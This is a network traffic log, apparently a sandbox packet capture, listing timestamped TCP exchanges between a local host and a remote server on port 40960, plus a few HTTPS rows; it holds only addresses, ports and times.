Jun 27, 2024 05:58:21.600980997 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600992918 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.601005077 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.601016998 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.604408026 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.604473114 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.604492903 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.604722977 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.604737043 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.604748964 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.604762077 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.604774952 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.604787111 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.604799986 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.604841948 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.604856014 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.604867935 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.604880095 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.604892015 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.604902983 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.604927063 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.604938984 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.604949951 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.604963064 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.605166912 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.605235100 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.605554104 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.605753899 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.605796099 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.605828047 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.605850935 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.605863094 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.605876923 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.605947971 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.605959892 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.605974913 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.605988026 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.605999947 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606021881 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606034040 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606070042 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606082916 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606136084 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606149912 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606163025 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606175900 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606188059 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606213093 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606225967 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606237888 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606261015 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606272936 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606283903 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606307983 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606322050 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606333017 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606345892 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606369019 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606381893 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606393099 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606416941 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606430054 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606441975 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606455088 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606477976 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606489897 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606503010 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606514931 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606539011 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606550932 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606564045 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606575966 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606601000 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606614113 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606626034 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606637001 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606662035 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606674910 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.606687069 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610300064 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610389948 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610403061 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610416889 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610429049 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610451937 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610465050 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610479116 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610543013 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610555887 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610569954 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.610599995 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610635996 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.610635996 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610650063 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610677958 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610691071 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610704899 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610802889 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610815048 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610826969 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610873938 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610888004 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610910892 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610924006 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610935926 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610948086 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610960007 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610972881 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610985041 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.610997915 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.611012936 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.611027002 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.611040115 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.611052036 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.611064911 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.611078024 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.611090899 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.611104012 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.611118078 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.611130953 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.611159086 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.611171961 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.611185074 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.611196995 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.611208916 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.611222029 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.611233950 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.611246109 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.611258030 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.611279964 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.611293077 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.611304045 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.611316919 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.611329079 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.615618944 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.615631104 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.615642071 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.615653992 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.615665913 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.615689039 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.615700960 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.615817070 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.615890026 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.616117954 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616131067 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616146088 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616271019 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616282940 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616297007 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616308928 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616358042 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616369963 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616383076 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616394997 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616435051 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616447926 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616460085 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616472960 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616504908 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616518021 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616529942 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616543055 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616566896 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616580009 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616590977 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616602898 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616626024 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616637945 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616648912 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616667032 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616689920 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616702080 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616739035 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616755962 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616767883 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616780043 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616791010 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616802931 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616817951 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616828918 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616841078 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616853952 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616875887 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616889000 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616899967 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616911888 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616924047 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616935968 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.616950989 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.620701075 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.620788097 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.620800972 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.620822906 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.620835066 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.620839119 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.620853901 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.620903969 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.620917082 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.620939970 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.620953083 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.620964050 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.620975018 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.620987892 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621014118 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621026039 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621038914 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.621042013 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621146917 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621160984 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621172905 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621186972 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621198893 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621211052 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621222973 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621234894 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621246099 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621270895 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621283054 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621294975 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621306896 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621319056 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621332884 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621345997 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621357918 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621380091 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621392965 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621403933 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621417999 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621429920 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621443987 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621468067 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621479988 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621490955 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621504068 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621529102 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621541023 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621725082 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621759892 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621773005 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621784925 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621824026 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621836901 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621850967 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.621975899 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.625996113 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626009941 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626033068 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626044989 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626058102 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626084089 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626096010 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626106977 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626236916 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.626315117 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.626462936 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626590967 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626604080 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626616955 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626641035 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626656055 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626677990 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626750946 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626764059 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626832008 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626843929 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626856089 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626869917 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626893997 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626907110 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626918077 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626934052 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626957893 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626970053 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.626998901 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.627012014 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.627048969 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.627062082 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.627084970 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.627181053 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.627193928 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.627207041 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.627248049 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.627273083 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.627286911 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.627311945 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.627322912 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.627341032 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.670808077 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.671067953 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.671189070 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.671189070 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.671222925 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.679302931 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.735157013 CEST	443	49705	104.98.116.138	192.168.2.7
Jun 27, 2024 05:58:21.735413074 CEST	49705	443	192.168.2.7	104.98.116.138
Jun 27, 2024 05:58:23.361594915 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:23.371391058 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:23.376409054 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:23.672645092 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:23.677124977 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:23.682007074 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:23.990689039 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:23.998220921 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:24.003283978 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:24.003315926 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:24.003372908 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:24.003401041 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:24.302936077 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:24.350662947 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:24.381603956 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:24.387253046 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:24.686944008 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:24.742508888 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:25.208767891 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:25.213880062 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:25.554249048 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:25.559370041 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:25.564364910 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:25.862629890 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:25.866537094 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:25.871540070 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:26.167690992 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:26.170458078 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:26.175415993 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:26.480962038 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:26.485522032 CEST	49707	40960	192.168.2.7	185.215.113.67
